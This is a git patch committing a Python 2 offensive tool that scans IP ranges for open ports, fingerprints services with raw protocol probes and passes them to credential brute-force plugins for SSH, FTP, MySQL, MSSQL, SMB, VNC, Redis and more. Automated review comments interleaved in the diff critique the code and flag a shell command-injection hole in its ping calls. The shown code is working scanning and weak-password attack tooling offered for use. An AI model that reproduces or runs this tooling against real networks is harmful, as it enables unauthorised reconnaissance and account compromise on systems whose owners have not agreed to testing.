From ec86a1a1e3c0c8e31dcdca3cacb0ebd62007c343 Mon Sep 17 00:00:00 2001 
From: InfoSec <1241112575@qq.com> Date: Tue, 3 Apr 2018 01:39:21 +0800 Subject: [PATCH] =?UTF-8?q?=E6=9A=B4=E5=8A=9B=E7=A0=B4=E8=A7=A3?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 暴力破解小脚本 --- Bruteforce/README.md | 23 + Bruteforce/bruteforce.py | 53 ++ Bruteforce/comm/__init__.py | 0 Bruteforce/comm/__init__.pyc | Bin 0 -> 129 bytes Bruteforce/comm/config.py | 45 ++ Bruteforce/comm/config.pyc | Bin 0 -> 1855 bytes Bruteforce/comm/portscan.py | 294 ++++++++++ Bruteforce/comm/portscan.pyc | Bin 0 -> 10369 bytes Bruteforce/comm/printers.py | 78 +++ Bruteforce/comm/printers.pyc | Bin 0 -> 3280 bytes Bruteforce/conf/.DS_Store | Bin 0 -> 6148 bytes Bruteforce/conf/.svn/all-wcprops | 11 + Bruteforce/conf/.svn/entries | 62 +++ .../conf/.svn/text-base/config.txt.svn-base | 7 + Bruteforce/conf/ftp.conf | 72 +++ Bruteforce/conf/ldapd.conf | 27 + Bruteforce/conf/mongodb.conf | 115 ++++ Bruteforce/conf/mssql.conf | 33 ++ Bruteforce/conf/mysql.conf | 75 +++ Bruteforce/conf/pop3.conf | 0 Bruteforce/conf/postgres.conf | 64 +++ Bruteforce/conf/signs.conf | 80 +++ Bruteforce/conf/smb.conf | 67 +++ Bruteforce/conf/snmp.conf | 1 + Bruteforce/conf/ssh.conf | 86 +++ Bruteforce/conf/tomcat.conf | 69 +++ Bruteforce/conf/vnc.conf | 34 ++ Bruteforce/conf/web.conf | 69 +++ Bruteforce/factorys/__init__.py | 1 + Bruteforce/factorys/__init__.pyc | Bin 0 -> 150 bytes Bruteforce/factorys/pluginFactory.py | 101 ++++ Bruteforce/factorys/pluginFactory.pyc | Bin 0 -> 4320 bytes Bruteforce/plugins/.DS_Store | Bin 0 -> 6148 bytes Bruteforce/plugins/__init__.py | 1 + Bruteforce/plugins/__init__.pyc | Bin 0 -> 171 bytes Bruteforce/plugins/ftp.py | 76 +++ Bruteforce/plugins/ftp.pyc | Bin 0 -> 3147 bytes Bruteforce/plugins/ldapd.py | 86 +++ Bruteforce/plugins/ldapd.pyc | Bin 0 -> 3353 bytes Bruteforce/plugins/mongodb.py | 101 ++++ Bruteforce/plugins/mongodb.pyc | Bin 0 -> 3718 bytes Bruteforce/plugins/mssql.py | 67 +++ Bruteforce/plugins/mssql.pyc | Bin 0 -> 
2889 bytes Bruteforce/plugins/mysql.py | 80 +++ Bruteforce/plugins/mysql.pyc | Bin 0 -> 3269 bytes Bruteforce/plugins/ndr.pyc | Bin 0 -> 51798 bytes Bruteforce/plugins/pop3.py | 61 ++ Bruteforce/plugins/pop3.pyc | Bin 0 -> 2301 bytes Bruteforce/plugins/postgres.py | 73 +++ Bruteforce/plugins/postgres.pyc | Bin 0 -> 2631 bytes Bruteforce/plugins/printers.pyc | Bin 0 -> 3380 bytes Bruteforce/plugins/redisexp.py | 66 +++ Bruteforce/plugins/redisexp.pyc | Bin 0 -> 2744 bytes Bruteforce/plugins/rsync.py | 97 ++++ Bruteforce/plugins/rsync.pyc | Bin 0 -> 4561 bytes Bruteforce/plugins/rsynclib.py | 194 +++++++ Bruteforce/plugins/rsynclib.pyc | Bin 0 -> 5937 bytes Bruteforce/plugins/rsyncs.pyc | Bin 0 -> 9732 bytes Bruteforce/plugins/smb.py | 72 +++ Bruteforce/plugins/smb.pyc | Bin 0 -> 3146 bytes Bruteforce/plugins/snmp.py | 65 +++ Bruteforce/plugins/snmp.pyc | Bin 0 -> 3157 bytes Bruteforce/plugins/ssh.py | 84 +++ Bruteforce/plugins/ssh.pyc | Bin 0 -> 3377 bytes Bruteforce/plugins/ssltest.py | 145 +++++ Bruteforce/plugins/ssltest.pyc | Bin 0 -> 5557 bytes Bruteforce/plugins/tomcat.pyc | Bin 0 -> 2789 bytes Bruteforce/plugins/vnc.py | 74 +++ Bruteforce/plugins/vnc.pyc | Bin 0 -> 2958 bytes Bruteforce/plugins/vnclib.py | 97 ++++ Bruteforce/plugins/vnclib.pyc | Bin 0 -> 3325 bytes Bruteforce/plugins/web.py | 119 ++++ Bruteforce/plugins/web.pyc | Bin 0 -> 4219 bytes Bruteforce/requirements.txt | 12 + Bruteforce/result/.DS_Store | Bin 0 -> 6148 bytes Scrack/README.md | 24 + Scrack/Scrack.py | 521 ++++++++++++++++++ 77 files changed, 3582 insertions(+) create mode 100644 Bruteforce/README.md create mode 100644 Bruteforce/bruteforce.py create mode 100644 Bruteforce/comm/__init__.py create mode 100644 Bruteforce/comm/__init__.pyc create mode 100644 Bruteforce/comm/config.py create mode 100644 Bruteforce/comm/config.pyc create mode 100644 Bruteforce/comm/portscan.py create mode 100644 Bruteforce/comm/portscan.pyc create mode 100644 Bruteforce/comm/printers.py create mode 100644 
Bruteforce/comm/printers.pyc create mode 100644 Bruteforce/conf/.DS_Store create mode 100644 Bruteforce/conf/.svn/all-wcprops create mode 100644 Bruteforce/conf/.svn/entries create mode 100644 Bruteforce/conf/.svn/text-base/config.txt.svn-base create mode 100644 Bruteforce/conf/ftp.conf create mode 100644 Bruteforce/conf/ldapd.conf create mode 100644 Bruteforce/conf/mongodb.conf create mode 100644 Bruteforce/conf/mssql.conf create mode 100644 Bruteforce/conf/mysql.conf create mode 100644 Bruteforce/conf/pop3.conf create mode 100644 Bruteforce/conf/postgres.conf create mode 100644 Bruteforce/conf/signs.conf create mode 100644 Bruteforce/conf/smb.conf create mode 100644 Bruteforce/conf/snmp.conf create mode 100644 Bruteforce/conf/ssh.conf create mode 100644 Bruteforce/conf/tomcat.conf create mode 100644 Bruteforce/conf/vnc.conf create mode 100644 Bruteforce/conf/web.conf create mode 100644 Bruteforce/factorys/__init__.py create mode 100644 Bruteforce/factorys/__init__.pyc create mode 100644 Bruteforce/factorys/pluginFactory.py create mode 100644 Bruteforce/factorys/pluginFactory.pyc create mode 100644 Bruteforce/plugins/.DS_Store create mode 100644 Bruteforce/plugins/__init__.py create mode 100644 Bruteforce/plugins/__init__.pyc create mode 100644 Bruteforce/plugins/ftp.py create mode 100644 Bruteforce/plugins/ftp.pyc create mode 100644 Bruteforce/plugins/ldapd.py create mode 100644 Bruteforce/plugins/ldapd.pyc create mode 100644 Bruteforce/plugins/mongodb.py create mode 100644 Bruteforce/plugins/mongodb.pyc create mode 100644 Bruteforce/plugins/mssql.py create mode 100644 Bruteforce/plugins/mssql.pyc create mode 100644 Bruteforce/plugins/mysql.py create mode 100644 Bruteforce/plugins/mysql.pyc create mode 100644 Bruteforce/plugins/ndr.pyc create mode 100644 Bruteforce/plugins/pop3.py create mode 100644 Bruteforce/plugins/pop3.pyc create mode 100644 Bruteforce/plugins/postgres.py create mode 100644 Bruteforce/plugins/postgres.pyc create mode 100644 
Bruteforce/plugins/printers.pyc create mode 100644 Bruteforce/plugins/redisexp.py create mode 100644 Bruteforce/plugins/redisexp.pyc create mode 100644 Bruteforce/plugins/rsync.py create mode 100644 Bruteforce/plugins/rsync.pyc create mode 100644 Bruteforce/plugins/rsynclib.py create mode 100644 Bruteforce/plugins/rsynclib.pyc create mode 100644 Bruteforce/plugins/rsyncs.pyc create mode 100644 Bruteforce/plugins/smb.py create mode 100644 Bruteforce/plugins/smb.pyc create mode 100644 Bruteforce/plugins/snmp.py create mode 100644 Bruteforce/plugins/snmp.pyc create mode 100644 Bruteforce/plugins/ssh.py create mode 100644 Bruteforce/plugins/ssh.pyc create mode 100644 Bruteforce/plugins/ssltest.py create mode 100644 Bruteforce/plugins/ssltest.pyc create mode 100644 Bruteforce/plugins/tomcat.pyc create mode 100644 Bruteforce/plugins/vnc.py create mode 100644 Bruteforce/plugins/vnc.pyc create mode 100644 Bruteforce/plugins/vnclib.py create mode 100644 Bruteforce/plugins/vnclib.pyc create mode 100644 Bruteforce/plugins/web.py create mode 100644 Bruteforce/plugins/web.pyc create mode 100644 Bruteforce/requirements.txt create mode 100644 Bruteforce/result/.DS_Store create mode 100644 Scrack/README.md create mode 100644 Scrack/Scrack.py diff --git a/Bruteforce/README.md b/Bruteforce/README.md new file mode 100644 index 0000000..e39c5fa --- /dev/null +++ b/Bruteforce/README.md @@ -0,0 +1,23 @@ +# bruteforce weak password +# ports&*weak password scanner. + +$ python bruteforce.py -h + + +usage: main.py [-h] [--ip IP] [--threads THREADS] [--P ISPING] + [--p USER_PORTS] [--file FILE] + + + +optional arguments: + -h, --help show this help message and exit + + --ip IP ip like 192.168.1.0/24 or 192.168.0.0/16 + + --threads THREADS Maximum threads, default 50 + + --P ISPING --P not mean no ping frist,default yes + + --p USER_PORTS --p scan ports;like 21,80,445 or 22-1000 + + --file FILE get ips or domains for this file 
diff --git a/Bruteforce/bruteforce.py b/Bruteforce/bruteforce.py new file mode 100644 index 0000000..5f603a4 --- /dev/null +++ b/Bruteforce/bruteforce.py @@ -0,0 +1,53 @@ +#coding=utf-8 +__author__ = 'unkonwn' +import argparse +from comm.printers import printPink,printRed,printGreen +from comm.config import * +from comm.portscan import * +from factorys.pluginFactory import * + + +#实例化config类 +c=config() + +if __name__ == '__main__': + #接受cmd参数 + parser = argparse.ArgumentParser(description='ports&*weak password scanner. teams:xdsec. author: wilson ') + parser.add_argument('--ip',action="store",required=False,dest="ip",type=str,help='ip like 192.168.1.0/24 or 192.168.0.0/16') + parser.add_argument("--threads",action="store",required=False,dest="threads",type=int,default=50,help='Maximum threads, default 50') + parser.add_argument("--P",action="store",required=False,dest="isping",type=str,default='yes',help='--P not mean no ping frist,default yes') + parser.add_argument("--p",action="store",required=False,dest="user_ports",type=str,default='',help='--p scan ports;like 21,80,445 or 22-1000') + parser.add_argument("--file",action="store",required=False,dest="file",type=str,help='get ips or domains for this file') + + args = parser.parse_args() + ip = args.ip + filename=args.file + + + #获取ip列表 + if ip: + ips=c.getips(ip) + file="result/%s.txt" %args.ip.replace("/","") + elif filename: + ips=c.file2list(filename) + filename=filename.split("/")[-1] + file="result/%s.txt" %filename + else: + print "error args";exit() + + isping=args.isping + user_posts=args.user_ports + threads=args.threads + + p=portscan(c,user_posts) + p.run(isping,threads,ips,file) + + #print p.ipdict,p.pinglist + plugins=pluginFactory(c) + for pluginname in plugins.pluginList: + #print pluginname + if pluginname: + pluginname.run(p.ipdict,p.pinglist,threads,file) + + + diff --git a/Bruteforce/comm/__init__.py b/Bruteforce/comm/__init__.py new file mode 100644 index 0000000..e69de29 
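Review bot: Neither `--ip` nor `--file` is required, so a call with no target only fails at the final `else`, where `print "error args";exit()` ends with status 0 and no usage text. Declaring both options inside `parser.add_mutually_exclusive_group(required=True)` lets argparse reject the call with a usage message and a non-zero status. In the `--file` branch, `filename.split("/")[-1]` does not strip Windows path separators before the name is interpolated into `"result/%s.txt"`; `os.path.basename(filename)` handles both, but needs `import os`. The local name `file` shadows the Python 2 builtin and `user_posts` looks like a typo for `user_ports`; `outfile` and `user_ports` would read better.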
diff --git a/Bruteforce/comm/__init__.pyc b/Bruteforce/comm/__init__.pyc new file mode 100644 index 0000000000000000000000000000000000000000..4d7c2e8cb8e2f4374cf10fdb19635ae34987c07b GIT binary patch literal 129 zcmZSn%*&P7;UAvN00oRd+5w1*S%5?e14FO|NW@PANHCxg#aciy7ps``%#w`Kq?iEL z;E_{_Y_lK6PNg31yOpmLks{FKt1R6CHN#X!se0Dc=9 AKmY&$ literal 0 HcmV?d00001 diff --git a/Bruteforce/comm/config.py b/Bruteforce/comm/config.py new file mode 100644 index 0000000..0dd00e4 --- /dev/null +++ b/Bruteforce/comm/config.py @@ -0,0 +1,45 @@ +#coding=utf-8 +__author__ = 'wilson' +from IPy import IP +from comm.printers import printPink,printRed,printGreen + +class config(object): + + def getips(self,ip): + iplist=[] + try: + if "-" in ip.split(".")[3]: + startnum=int(ip.split(".")[3].split("-")[0]) + endnum=int(ip.split(".")[3].split("-")[1]) + for i in range(startnum,endnum): + iplist.append("%s.%s.%s.%s" %(ip.split(".")[0],ip.split(".")[1],ip.split(".")[2],i)) + else: + ips=IP(ip) + for i in ips: + iplist.append(str(i)) + + return iplist + + except: + printRed("[!] not a valid ip given. you should put ip like 192.168.1.0/24, 192.168.0.0/16,192.168.0.1-200") + exit() + + + def file2list(self,file): + iplist=[] + try: + fh = open(file) + for ip in fh.readlines(): + ip=ip.strip() + iplist.append(ip) + fh.close() + return iplist + except Exception, e: + print e + exit() + + + def write_file(self,file,contents): + f2 = open(file,'a+') + f2.write(contents) + f2.close() \ No newline at end of file 
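Review bot: `file2list` returns every line of the input file after `strip()` without any validation, so blank lines and arbitrary strings are passed on as hosts; elsewhere in this commit these values are concatenated into ping command strings. Dropping empty lines and checking each entry against an address/hostname pattern before returning would stop malformed input at this boundary. The handle also stays open if reading raises; `with open(file) as fh:` closes it on every path. In `getips` the bare `except:` also catches `KeyboardInterrupt` and `SystemExit`; for the parsing shown, `except (ValueError, IndexError):` is probably the narrow form, to be confirmed against what `IP()` raises.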
diff --git a/Bruteforce/comm/config.pyc b/Bruteforce/comm/config.pyc new file mode 100644 index 0000000000000000000000000000000000000000..b4040d8bf8f048e977d7a57ea96bb84aee06689a GIT binary patch literal 1855 zcmbtVQEwYX5T3m|J5EU2A|PNmY}h@W2y)jsL)3;2rp8E>097A+ zVxj@8qS&KE(afWPM~Z!)5}#%P4FZ}~Xi%Y9l?GL;1*F$#jED;TLUcy-{h&s1mHN#! zBy?4nXC|>(YW~KjsraD>^LVexrQJGAUYOMFne^DzR$i!Mx3O{_6V5s9FJWLdlz{oM5i8|{KfAr6-_~dM`zM` z{kTfS@8tfyz)?z~0;(hU)c^0ON*NW<;x}et>C-ZxGmjoT`I1g6wDf2Syw$4!kopQB zB)Q_R!LQIbplu*fKmJVnX`5WYNf=U<7Po0xMUDDp4ToYCUY1w>pna6?@278&QVK-J zHCb?LyrC*p^c`sJH+ipmpn+&dY|HqV8w@i1)V>7swr#Ec4KrP?L5@B5tawNEddKSi&l4Z~8WGpf@ zxx8wS);f`=by4Bc`AnW8A5S@@DXZqT35UeU^ufmm6XTBNhX;EP``;cM7IUY^SuxTF zqii;VVMVv{6UhgpCb!&;y~$}*Rr#u}-of9t`pVl>Tk3VM=J{$viH!Mpaof8X_9vKg z8TZK1N&r4Bc35gt>^4CLx9Ak&2xtm@L-d%7>{yAcpF0o(g5jZjDT`YafXd?yD(0l1 zQw8lj`T~GC`H;b9mc6n!+Y`YCpGQO!^QJd;zuv}BuRYi?_ ztS}D#-o>!*!ju&A1>o_?FDV9NOd~tOuZsEPFzTLV8@(r&P{_rEfoFwrI;_KOas}x* ze3MsM29SpXkGAZ)`=ZVARVsys+%ki=OfaFlE!AWNNwwiHjb?f{l&g0*oMrJmfg8St zfbcCgcVI3-$n3dP9&#-%E%mG3`m5{LdUCOx*No=wC@TPgseZh7QXW^91Rs}{{8Z?| lhRmg$-jG?7!;>9O^~gzu{{vB&_@wOpQ!Z0NRX5a4?;m~EVO{_L literal 0 HcmV?d00001 diff --git a/Bruteforce/comm/portscan.py b/Bruteforce/comm/portscan.py new file mode 100644 index 0000000..690de9e --- /dev/null +++ b/Bruteforce/comm/portscan.py 
@@ -0,0 +1,294 @@ +#coding=utf-8 +__author__ = 'wilson' +import sys +sys.path.append("../") +from comm.config import * +from comm.printers import printPink,printRed,printGreen + +import threading +from threading import Thread +from Queue import Queue +import platform +from subprocess import Popen, PIPE +import re +import time +import socket +socket.setdefaulttimeout(10) #设置了全局默认超时时间 + +class portscan(): + + """docstring for ClassName""" + def __init__(self,c,user_ports): + self.config=c + self.PROBES =[ + '\r\n\r\n', + 'GET / HTTP/1.0\r\n\r\n', + 'GET / \r\n\r\n', + '\x01\x00\x00\x00\x01\x00\x00\x00\x08\x08', + '\x80\0\0\x28\x72\xFE\x1D\x13\0\0\0\0\0\0\0\x02\0\x01\x86\xA0\0\x01\x97\x7C\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', + '\x03\0\0\x0b\x06\xe0\0\0\0\0\0', + '\0\0\0\xa4\xff\x53\x4d\x42\x72\0\0\0\0\x08\x01\x40\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x40\x06\0\0\x01\0\0\x81\0\x02PC NETWORK PROGRAM 1.0\0\x02MICROSOFT NETWORKS 1.03\0\x02MICROSOFT NETWORKS 3.0\0\x02LANMAN1.0\0\x02LM1.2X002\0\x02Samba\0\x02NT LANMAN 1.0\0\x02NT LM 0.12\0', + '\x80\x9e\x01\x03\x01\x00u\x00\x00\x00 \x00\x00f\x00\x00e\x00\x00d\x00\x00c\x00\x00b\x00\x00:\x00\x009\x00\x008\x00\x005\x00\x004\x00\x003\x00\x002\x00\x00/\x00\x00\x1b\x00\x00\x1a\x00\x00\x19\x00\x00\x18\x00\x00\x17\x00\x00\x16\x00\x00\x15\x00\x00\x14\x00\x00\x13\x00\x00\x12\x00\x00\x11\x00\x00\n\x00\x00\t\x00\x00\x08\x00\x00\x06\x00\x00\x05\x00\x00\x04\x00\x00\x03\x07\x00\xc0\x06\x00@\x04\x00\x80\x03\x00\x80\x02\x00\x80\x01\x00\x80\x00\x00\x02\x00\x00\x01\xe4i<+\xf6\xd6\x9b\xbb\xd3\x81\x9f\xbf\x15\xc1@\xa5o\x14,M \xc4\xc7\xe0\xb6\xb0\xb2\x1f\xf9)\xe8\x98', + '\x16\x03\0\0S\x01\0\0O\x03\0?G\xd7\xf7\xba,\xee\xea\xb2`~\xf3\0\xfd\x82{\xb9\xd5\x96\xc8w\x9b\xe6\xc4\xdb<=\xdbo\xef\x10n\0\0(\0\x16\0\x13\0\x0a\0f\0\x05\0\x04\0e\0d\0c\0b\0a\0`\0\x15\0\x12\0\x09\0\x14\0\x11\0\x08\0\x06\0\x03\x01\0', + '< NTP/1.2 >\n', + '< NTP/1.1 >\n', + '< NTP/1.0 >\n', + '\0Z\0\0\x01\0\0\0\x016\x01,\0\0\x08\0\x7F\xFF\x7F\x08\0\0\0\x01\0 
\0:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\04\xE6\0\0\0\x01\0\0\0\0\0\0\0\0(CONNECT_DATA=(COMMAND=version))', + '\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x01\x55\x00\x00\x00\x4d\x53\x53\x51\x4c\x53\x65\x72\x76\x65\x72\x00\x48\x0f\x00\x00', + '\0\0\0\0\x44\x42\x32\x44\x41\x53\x20\x20\x20\x20\x20\x20\x01\x04\0\0\0\x10\x39\x7a\0\x01\0\0\0\0\0\0\0\0\0\0\x01\x0c\0\0\0\0\0\0\x0c\0\0\0\x0c\0\0\0\x04', + '\x01\xc2\0\0\0\x04\0\0\xb6\x01\0\0\x53\x51\x4c\x44\x42\x32\x52\x41\0\x01\0\0\x04\x01\x01\0\x05\0\x1d\0\x88\0\0\0\x01\0\0\x80\0\0\0\x01\x09\0\0\0\x01\0\0\x40\0\0\0\x01\x09\0\0\0\x01\0\0\x40\0\0\0\x01\x08\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x01\0\0\x40\0\0\0\x40\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x02\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\0\0\0\0\x01\0\0\x40\0\0\0\0\x04\0\0\0\x04\0\0\x80\0\0\0\x01\x04\0\0\0\x04\0\0\x80\0\0\0\x01\x04\0\0\0\x03\0\0\x80\0\0\0\x01\x04\0\0\0\x04\0\0\x80\0\0\0\x01\x08\0\0\0\x01\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x10\0\0\0\x01\0\0\x80\0\0\0\x01\x10\0\0\0\x01\0\0\x80\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x09\0\0\0\x01\0\0\x40\0\0\0\x01\x09\0\0\0\x01\0\0\x80\0\0\0\x01\x04\0\0\0\x03\0\0\x80\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\x01\x04\0\0\x01\0\0\x80\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\x40\0\0\0\x01\0\0\0\0\x01\0\0\x40\0\0\0\0\x20\x20\x20\x20\x20\x20\x20\x20\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\xff\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xe4\x04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x7f', + '\x41\0\0\0\x3a\x30\0\0\xff\xff\xff\xff\xd4\x07\0\0\0\0\0\0test.$cmd\0\0\0\0\0\xff\xff\xff\xff\x1b\0\0\0\x01serverStatus\0\0\0\0\0\0\0\xf0\x3f\0' + ] + self.SIGNS =self.config.file2list("conf/signs.conf") + self.ports=[] + self.getports(user_ports) + self.lock = threading.Lock() + self.pinglist=[] + self.q=Queue() + self.sp=Queue() + 
self.signs=self.prepsigns() + + self.ipdict={} + self.ipdict['ldap']=[] + self.ipdict['mysql']=[] + self.ipdict['mssql']=[] + self.ipdict['ftp']=[] + self.ipdict['ssh']=[] + self.ipdict['smb']=[] + self.ipdict['vnc']=[] + self.ipdict['pop3']=[] + self.ipdict['rsync']=[] + self.ipdict['http']=[] + self.ipdict['https']=[] + self.ipdict['mongodb']=[] + self.ipdict['postgres']=[] + self.ipdict['redis']=[] + self.ipdict['ssl']=[] + self.ipdict['Unknown']=[] + + + #获取扫描端口列表 + def getports(self,user_ports): + if user_ports=='': + self.ports=[21,22,23,80,81,443,389,445,843,873,1043,1099,1194,1433,1434,1521,2601,2604,3306,3307,3128,3389,3812,4440,4848,5432,5900,5901,5902,5903,6082,6000,6379,7001,7002,8080,8181,8888,8090,8000,8008,8009,8081,8088,8089,9000,9080,9043,9090,9091,9200,9528,10000,11211,10022,15000,16000,22022,22222,27017,28017,17017,18017,11321,50060] + else: + try: + if user_ports.find(",")>0: + for port in user_ports.split(','): + self.ports.append(int(port)) + + elif user_ports.find("-")>0: + startport=int(user_ports.split('-')[0]) + endport=int(user_ports.split('-')[1]) + for i in xrange(startport,endport+1): + self.ports.append(i) + else: + self.ports.append(int(user_ports)) + except : + printRed('[!] not a valid ports given. 
you should put ip like 22,80,1433 or 22-1000') + exit() + + #ping扫描函数 + def pinger(self): + while True: + ip=self.q.get() + if platform.system()=='Linux': + p=Popen(['ping','-c 2',ip],stdout=PIPE) + m = re.search('(\d)\sreceived', p.stdout.read()) + try: + if m.group(1)!='0': + self.pinglist.append(ip) + self.lock.acquire() + printRed("%s is live!!\r\n" % ip) + self.lock.release() + except:pass + + if platform.system()=='Darwin': + import commands + p=commands.getstatusoutput("ping -c 2 "+ip) + m = re.findall('ttl', p[1]) + try: + if m: + self.pinglist.append(ip) + self.lock.acquire() + printRed("%s is live!!\r\n" % ip) + self.lock.release() + except:pass + + if platform.system()=='Windows': + p=Popen('ping -n 2 ' + ip, stdout=PIPE) + m = re.findall('TTL', p.stdout.read()) + if m: + self.pinglist.append(ip) + self.lock.acquire() + printRed("%s is live!!\r\n" % ip) + self.lock.release() + self.q.task_done() + + + def pingscan(self,isping,threads,ips): + starttime=time.time() + friststarttime=time.time() + print "[*] start Scanning at %s" % time.ctime() + #isping=='no' 就禁ping扫描 + #默认ping 扫描 + if isping=='yes': + print "Scanning for live machines..." 
+ for i in xrange(threads): + t = Thread(target=self.pinger) + t.setDaemon(True) + t.start() + for ip in ips: + self.q.put(ip) + + self.q.join() + + else: + self.pinglist=ips + + if len(self.pinglist)==0: + print "not find any live machine - -|||" + exit() + + print "[*] Scanning for live machines done,it has Elapsed time:%s " % (time.time()-starttime) + + + + def prepsigns(self): + signlist=[] + for item in self.SIGNS: + (label,pattern)=item.split('|',2) + sign=(label,pattern) + signlist.append(sign) + return signlist + + def matchbanner(self,banner,slist): + #print banner + for item in slist: + p=re.compile(item[1]) + #print item[1] + if p.search(banner)!=None: + return item[0] + return 'Unknown' + + + #扫端口及其对应服务类型函数 + def scanports(self): + while True: + ip,port=self.sp.get() + #print ip,port + s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) + #判断端口的服务类型 + service='Unknown' + try: + s.connect((ip,port)) + except: + self.sp.task_done() + continue + + try: + result = s.recv(256) + service=self.matchbanner(result,self.signs) + except: + for probe in self.PROBES: + #print probe + try: + s.close() + sd=socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sd.settimeout(5) + sd.connect((ip,port)) + sd.send(probe) + except: + continue + try: + result=sd.recv(256) + service=self.matchbanner(result,self.signs) + if service!='Unknown': + break + except: + continue + + if service not in self.ipdict: + self.ipdict[service]=[] + self.ipdict[service].append(ip+':'+str(port)) + self.lock.acquire() + printRed("%s opening %s\r\n" %(ip,port)) + self.lock.release() + else: + self.ipdict[service].append(ip+':'+str(port)) + self.lock.acquire() + printRed("%s opening %s\r\n" %(ip,port)) + self.lock.release() + + self.sp.task_done() + + + def portsscan(self,threads,file): + print "Scanning ports now..." 
+ print "[*] start Scanning live machines' ports at %s" % time.ctime() + starttime=time.time() + + for i in xrange(threads): + st=Thread(target=self.scanports) + st.setDaemon(True) + st.start() + + for scanip in self.pinglist: + for port in self.ports: + self.sp.put((scanip,port)) + self.sp.join() + print "[*] Scanning ports done,it has Elapsed time:%s " % (time.time()-starttime) + #将服务端口 信息 记录文件 + for name in self.ipdict.keys(): + if len(self.ipdict[name]): + contents=str(name)+' service has:\n'+' '+str(self.ipdict[name])+'\n' + self.config.write_file(contents=contents,file=file) + + + #处理没有识别的服务 + def handleunknown(self): + for ip in self.ipdict['Unknown']: + #print ip + try: + if str(ip).split(':')[1]=='389': + self.ipdict['ldap'].append(ip) + if str(ip).split(':')[1]=='445': + self.ipdict['smb'].append(ip) + if str(ip).split(':')[1] in ['3306','3307','3308','3309']: + self.ipdict['mysql'].append(ip) + if str(ip).split(':')[1]=='1433': + self.ipdict['mssql'].append(ip) + if str(ip).split(':')[1] in ['10022','22']: + self.ipdict['ssh'].append(ip) + if str(ip).split(':')[1]=='27017': + self.ipdict['mongodb'].append(ip) + if str(ip).split(':')[1]=='110': + self.ipdict['pop3'].append(ip) + if str(ip).split(':')[1]=='5432': + self.ipdict['postgres'].append(ip) + if str(ip).split(':')[1]=='443': + self.ipdict['ssl'].append(ip) + if str(ip).split(':')[1]=='873': + self.ipdict['rsync'].append(ip) + if str(ip).split(':')[1]=='6379': + self.ipdict['redis'].append(ip) +# if str(ip).split(':')[1]=='21': +# self.ipdict['ftp'].append(ip) + except Exception as e: + print e + #处理被识别为http的mongo + for ip in self.ipdict['http']: + if str(ip).split(':')[1]=='27017': + self.ipdict['http'].remove(ip) + self.ipdict['mongodb'].append(ip) + + def run(self,isping,threads,ips,file): + self.pingscan(isping,threads,ips) + self.portsscan(threads,file) + self.handleunknown() + + + + + + 
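Review bot: In `pinger`, the Darwin branch calls `commands.getstatusoutput("ping -c 2 "+ip)` and the Windows branch calls `Popen('ping -n 2 ' + ip, stdout=PIPE)`, both building the command by string concatenation from `ip`. That value can come from the `--file` list, which is read without validation, and `commands.getstatusoutput` runs its argument through a shell, so a crafted line in a targets file would execute on the operator's own machine; the Windows form at least allows extra ping arguments to be injected. The Linux branch already passes an argument list, and the other two should do the same, e.g. `p=Popen(['ping','-c','2',ip],stdout=PIPE)` followed by `m = re.findall('ttl', p.stdout.read())`. The `except:pass` blocks in the same function hide any failure of the ping call, and the sockets created in `scanports` (`s`, `sd`) are never closed once a service has been identified.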
diff --git a/Bruteforce/comm/portscan.pyc b/Bruteforce/comm/portscan.pyc new file mode 100644 index 0000000000000000000000000000000000000000..cb8e5bab7cab36a96a66e242ad728215846ae049 GIT binary patch literal 10369 zcmb_iYiu0Xbv`r8_gfSndTZoZ7G+a>%6eI{Ns$z#TBPJz+LUQ4>*dan9CBaW8A@bI z)w1OVZIPx)3)D`Gy7^H9ef$YhAZQY_jokn)P{94sGzDs)hzlbq60~+;Bt?Ft?)RO$ zORnfg)mXcnv**6gz4x4RzjKGN_Z#aPUw;3IloUTP{0`v>{|&?wnE|!Lvn6fGj3vG$ zi?%Gr#EZ!-ODvXENV-C%$W=gcjm*@TTIiuxW@@#!D)N~+nW-~n z)sn84Oufw1Z`5s&nFg&}Bk4xTG|5bpWSV8Bd80;)%(Rqb+a@#HN_?x#w2I#jhtBHd1(91KPtLS)Lh-IfOfjkgxgMm$TsHUspUIFb(9_e~WwDgx{w`)kwIKOI zkc}<}*`=talyZG9sw*YN3%;K2&PX~LhLg#RpW?Fc*@kBX zPxu80x^Bt3NTQ@RkjH~mkOz`L28@nzF(Ssoo-~TrBwn+4*vf4(zfId}4~s%g^IExs z>@X(t=p0N1>0+g<+q${fz{P5AE6Zw1m1+f>Qp~I`;~TVbW2vY~0@JX$*l-b|Y?sq! zC??v<6Yb@Rj`Bojd16O-VrO|`S9xN0d16m_VsCk3UwLAGdBQ1A94JrRBd0xqhJOaT zG8tBY!p!T!RxsmZQ%fJ@_C}H#$ET(y?8eVck*>o3?A;EQA6u-? ze@(0xvE(2Agw&guNPX20wJ`cqQ|C`Uh)Z;11ZIxxG>^gieEZ6RVt1%fAAv<2HD`^@Z`ksq_({{(cd$0rLS*5?07OW 